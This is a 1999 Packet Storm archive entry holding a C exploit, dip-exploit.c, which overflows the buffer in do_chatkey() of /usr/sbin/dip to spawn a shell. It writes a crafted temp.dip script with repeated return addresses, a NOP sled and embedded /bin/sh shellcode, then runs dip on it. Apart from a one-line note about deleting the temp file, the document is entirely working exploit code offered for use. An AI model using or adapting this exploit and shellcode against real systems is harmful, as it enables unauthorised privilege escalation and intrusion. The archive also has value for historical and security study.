dip-exploit.sh

1999-08-17T00:00:00
ID PACKETSTORM:15138
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `justa note.. dont forget to erase the temp.dip file when you run this  
exploit.  
  
  
/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */  
  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <fcntl.h>  
#include <sys/stat.h>  
  
#define PATH_DIP "/usr/sbin/dip"  
  
u_char shell[] = /* courtesy of avalon ;) */  
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"  
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"  
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";  
  
u_long esp() { __asm__("movl %esp, %eax"); }  
  
main()  
{  
u_char buf[1024];  
u_long addr;  
int i, f;  
  
strcpy(buf, "chatkey ");  
addr = esp() - 192;  
for (i=8; i<128+16; i+=4)  
*((u_long *) (buf+i)) = addr;  
for (i=128+16; i<512; i++)  
buf[i] = 0x90;  
for (i=0; i<strlen(shell); i++)  
buf[512+i] = shell[i];  
buf[512+i] = '\n';  
  
if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {  
perror("temp.dip");  
exit(0);  
}  
write(f, buf, 512+i);  
close(f);  
  
execl(PATH_DIP, "dip", "temp.dip", (char *)0);  
}  
`